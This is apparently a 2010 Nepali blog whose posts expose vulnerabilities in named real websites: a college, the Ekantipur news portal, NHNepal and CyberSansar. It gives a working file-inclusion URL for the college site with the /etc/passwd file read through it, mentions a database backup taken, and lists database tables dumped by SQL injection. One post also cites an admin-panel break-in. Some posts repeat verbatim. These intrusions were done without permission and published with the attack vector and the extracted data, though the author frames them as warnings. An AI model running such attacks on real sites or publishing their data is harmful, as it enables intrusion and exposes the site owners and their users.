I was checking the site of Little Angels College of Management when they were here in KU for the sports week. & in a while, I found it to be vulnerable to file inclusion vulnerability.
Vulnerable URL is:
http://lacm.edu.np/?lacm=[any_file_to_include]
/etc/passwd:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash postfix:x:89:89::/var/spool/postfix:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin shiva:x:500:500::/home/shiva:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin admispconfig:x:501:501:Administrator ISPConfig:/home/admispconfig:/bin/bash
And I also got the sql Db.. what the hell they are keeping database backup in the website root folder itself.
See you guys.
Sunday, 25 April 2010
Ekantipur.com [Ekantipur -online news portal of Kantipur Daily] Vulnerability
Most of us know about Ekantipur.com, online news portal of kantipur daily newspaper. They recently came with new design and development & I was hoping to see securely coded website but I was still able to find some holes in the website. There is a SQL injection vuln in the site of kantipur daily which can be used to potentially dump the DB & then the admin panel can be compromised and possibly we can get shell in the site..
I hope they will soon fix it.. & if they want to get the information of the vulnerability, I would be happy to help them.
Database tables in the current DB:
» daily_updates
» ek_categories
» ek_gallary_comments
» ek_gallary_images
» ek_gallery_image_rating
» ek_news
» ek_news_comments
» ek_news_gallary
» ek_news_gallary_details
» ek_news_keywords
» ek_news_keywords_list
» ek_news_ratings
» ek_news_reporter_list
» ek_news_reporters
» ek_photo_features
» ek_photo_gallary
» ek_sub_categories
» ekn_categories
» ekn_gallary_comments
» ekn_gallary_images
» ekn_gallery_image_rating
» ekn_news
» ekn_news_comments
» ekn_news_gallary
» ekn_news_gallary_details
» ekn_news_keywords
» ekn_news_keywords_list
» ekn_news_ratings
» ekn_news_reporter_list
» ekn_news_reporters
» ekn_photo_features
» ekn_photo_gallary
» ekn_photo_gallary_details
» ekn_sub_categories
» exchange_rates
» horoscope
» horoscope_reading
» horroscope
» kan_categories
» kan_gallary_images
» kan_main_photo
» kan_news
» kan_news_author_list
» kan_news_comments
» kan_news_gallary
» kan_news_gallary_details
» kan_news_keywords
» kan_news_keywords_list
» kan_news_ratings
» kan_news_reporter_list
» kan_news_reporters
» kan_photo_features
» kan_photo_gallary
» kan_photo_gallary_details
» kan_sub_categories
» kq_categories
» kq_gallary_images
» kq_issue
» kq_main_photo
» kq_news
» kq_news_author_list
» kq_news_authors
» kq_news_comments
» kq_news_gallary
» kq_news_gallary_details
» kq_news_keywords
» kq_news_keywords_list
» kq_news_ratings
» kq_photo_features
» kq_photo_gallary
» kq_photo_gallary_details
» kq_sub_categories
» login_records
» models
» models_gallery_images
» nar_categories
» nar_gallary_images
» nar_issue
» nar_news
» nar_news_author_list
» nar_news_authors
» nar_news_comments
» nar_news_gallary
» nar_news_gallary_details
» nar_news_keywords
» nar_news_keywords_list
» nar_news_ratings
» nar_photo_features
» nar_photo_gallary
» nar_photo_gallary_details
» nar_sub_categories
» nep_categories
» nep_gallary_images
» nep_issue
» nep_news
» nep_news_author_list
» nep_news_authors
» nep_news_comments
» nep_news_gallary
» nep_news_gallary_details
» nep_news_keywords
» nep_news_keywords_list
» nep_news_ratings
» nep_photo_features
» nep_photo_gallary
» nep_sub_categories
» nepa_year
» nepse_chart
» news_agency
» news_keywords
» news_status
» news_types
» papers
» photo_gallary_details
» poll_option
» poll_ques
» privilege
» ratings
» sap_blow_up
» sap_categories
» sap_gallary_images
» sap_issue
» sap_news
» sap_news_author_list
» sap_news_authors
» sap_news_comments
» sap_news_gallary
» sap_news_gallary_details
» sap_news_keywords
» sap_news_keywords_list
» sap_news_ratings
» sap_photo_features
» sap_photo_gallary
» sap_photo_gallary_details
» sap_sub_categories
» stock_trading_companies
» tithi
» tkp_categories
» tkp_gallary_images
» tkp_main_photo
» tkp_news
» tkp_news_comments
» tkp_news_gallary
» tkp_news_gallary_details
» tkp_news_keywords
» tkp_news_keywords_list
» tkp_news_ratings
» tkp_news_reporter_list
» tkp_news_reporters
» tkp_photo_features
» tkp_photo_gallary
» tkp_photo_gallary_details
» tkp_sub_categories
» user_paper_privileges
» user_type_privileges
» user_types
» users
» video_categories
» videos
» weather_details
» weather_place
» wp_1_comments
» wp_1_links
» wp_1_options
» wp_1_postmeta
» wp_1_posts
» wp_1_term_relationships
» wp_1_term_taxonomy
» wp_1_terms
» wp_blog_versions
» wp_blogs
» wp_registration_log
» wp_signups
» wp_site
» wp_sitecategories
» wp_sitemeta
» wp_usermeta
» wp_users
No other dumps made over here for the reason of security. Hope they will secure it.
Thank you.
I hope they will soon fix it.. & if they want to get the information of the vulnerability, I would be happy to help them.
Database tables in the current DB:
» daily_updates
» ek_categories
» ek_gallary_comments
» ek_gallary_images
» ek_gallery_image_rating
» ek_news
» ek_news_comments
» ek_news_gallary
» ek_news_gallary_details
» ek_news_keywords
» ek_news_keywords_list
» ek_news_ratings
» ek_news_reporter_list
» ek_news_reporters
» ek_photo_features
» ek_photo_gallary
» ek_sub_categories
» ekn_categories
» ekn_gallary_comments
» ekn_gallary_images
» ekn_gallery_image_rating
» ekn_news
» ekn_news_comments
» ekn_news_gallary
» ekn_news_gallary_details
» ekn_news_keywords
» ekn_news_keywords_list
» ekn_news_ratings
» ekn_news_reporter_list
» ekn_news_reporters
» ekn_photo_features
» ekn_photo_gallary
» ekn_photo_gallary_details
» ekn_sub_categories
» exchange_rates
» horoscope
» horoscope_reading
» horroscope
» kan_categories
» kan_gallary_images
» kan_main_photo
» kan_news
» kan_news_author_list
» kan_news_comments
» kan_news_gallary
» kan_news_gallary_details
» kan_news_keywords
» kan_news_keywords_list
» kan_news_ratings
» kan_news_reporter_list
» kan_news_reporters
» kan_photo_features
» kan_photo_gallary
» kan_photo_gallary_details
» kan_sub_categories
» kq_categories
» kq_gallary_images
» kq_issue
» kq_main_photo
» kq_news
» kq_news_author_list
» kq_news_authors
» kq_news_comments
» kq_news_gallary
» kq_news_gallary_details
» kq_news_keywords
» kq_news_keywords_list
» kq_news_ratings
» kq_photo_features
» kq_photo_gallary
» kq_photo_gallary_details
» kq_sub_categories
» login_records
» models
» models_gallery_images
» nar_categories
» nar_gallary_images
» nar_issue
» nar_news
» nar_news_author_list
» nar_news_authors
» nar_news_comments
» nar_news_gallary
» nar_news_gallary_details
» nar_news_keywords
» nar_news_keywords_list
» nar_news_ratings
» nar_photo_features
» nar_photo_gallary
» nar_photo_gallary_details
» nar_sub_categories
» nep_categories
» nep_gallary_images
» nep_issue
» nep_news
» nep_news_author_list
» nep_news_authors
» nep_news_comments
» nep_news_gallary
» nep_news_gallary_details
» nep_news_keywords
» nep_news_keywords_list
» nep_news_ratings
» nep_photo_features
» nep_photo_gallary
» nep_sub_categories
» nepa_year
» nepse_chart
» news_agency
» news_keywords
» news_status
» news_types
» papers
» photo_gallary_details
» poll_option
» poll_ques
» privilege
» ratings
» sap_blow_up
» sap_categories
» sap_gallary_images
» sap_issue
» sap_news
» sap_news_author_list
» sap_news_authors
» sap_news_comments
» sap_news_gallary
» sap_news_gallary_details
» sap_news_keywords
» sap_news_keywords_list
» sap_news_ratings
» sap_photo_features
» sap_photo_gallary
» sap_photo_gallary_details
» sap_sub_categories
» stock_trading_companies
» tithi
» tkp_categories
» tkp_gallary_images
» tkp_main_photo
» tkp_news
» tkp_news_comments
» tkp_news_gallary
» tkp_news_gallary_details
» tkp_news_keywords
» tkp_news_keywords_list
» tkp_news_ratings
» tkp_news_reporter_list
» tkp_news_reporters
» tkp_photo_features
» tkp_photo_gallary
» tkp_photo_gallary_details
» tkp_sub_categories
» user_paper_privileges
» user_type_privileges
» user_types
» users
» video_categories
» videos
» weather_details
» weather_place
» wp_1_comments
» wp_1_links
» wp_1_options
» wp_1_postmeta
» wp_1_posts
» wp_1_term_relationships
» wp_1_term_taxonomy
» wp_1_terms
» wp_blog_versions
» wp_blogs
» wp_registration_log
» wp_signups
» wp_site
» wp_sitecategories
» wp_sitemeta
» wp_usermeta
» wp_users
No other dumps made over here for the reason of security. Hope they will secure it.
Thank you.
NHNepal.com New Horizons Computer Learning Centers Vulnerability
NHNepal.com is the official site of New Horizons Computer Learning Centers in Nepal which is vulnerable to minor injection attack. This vulnerability was reported to us by someone and full credit goes to him/her for finding this.
They state:
With over 300 centers in 70 countries, New Horizons is the world’s largest independent IT training company. Over the past 25 years, New Horizons has delivered a full range of IT training and business skills training through innovative learning methods that have transformed businesses and helped over 25 million students reach their goals.
Anyway, logged in admin panel screenshot from the hacker himself:
Thanks.. Hope they soon secure it or otherwise they will become victim of another pwnage.
They state:
With over 300 centers in 70 countries, New Horizons is the world’s largest independent IT training company. Over the past 25 years, New Horizons has delivered a full range of IT training and business skills training through innovative learning methods that have transformed businesses and helped over 25 million students reach their goals.
Anyway, logged in admin panel screenshot from the hacker himself:
Thanks.. Hope they soon secure it or otherwise they will become victim of another pwnage.
Monday, 12 April 2010
Cybersansar vulnerability re-exposed
One of the most visited sites from Nepal, CyberSansar.com is vulnerable to lots of serious injections like SQLi and XSS but today here I'm going to post the SQL injection in the site. I hope they will try to fix the site after reading this post. No offense at all to them. Moreover, the MySQL version is greater than 5 so its easier for the attacker to steal the database information.
User: database => cybernepal3@localhost:cybernepal_3
Tables:
album_detail album_master album_person_related art_gallery art_gallery_image art_gallery_path art_grp_tag_gal art_tag_gallery art_tag_photo art_tags article_person_related author bachelor_user_logon bc_category_para bc_final_person_profile bc_person_profile bc_photo_folder bc_profile_list bc_profile_para contest_master contest_question_detail contest_question_master cs_birthday_wish discography ethnicity_para ev_gallery ev_gallery_image ev_gallery_path ev_grp_tag_gal ev_person_related ev_tag_gallery ev_tag_photo ev_tags event_master event_para_person_related event_type gallery gallery_image gallery_path group_list grp_tag_gal job org_para org_type person_persontype person_taghion photographer popular_models pr_category_para pr_gallery_image pr_hion pr_person_detail pr_person_profile pr_persontype pr_persontype_para pr_photos pr_profile_list pr_profile_para pr_question_related pr_subcategory_para pr_users profile profile1 profile_persontype register_users section song_genre_related song_orginal_singer_related song_person_related srw_login srw_news tag tag_article tag_gallery tag_list tag_photo tags user_logon users users_artist vdb_music_category vdb_video_info vdb_video_info_backup video_feature_singer_related video_genre_related video_orginal_singer_related video_person_related wallpaper wallpaper_gallery
I'm lazy to dump each column's data lol. Anyway, its just the message to CS how insecure they are.
Hope they fix this soon.
Subscribe to:
Posts (Atom)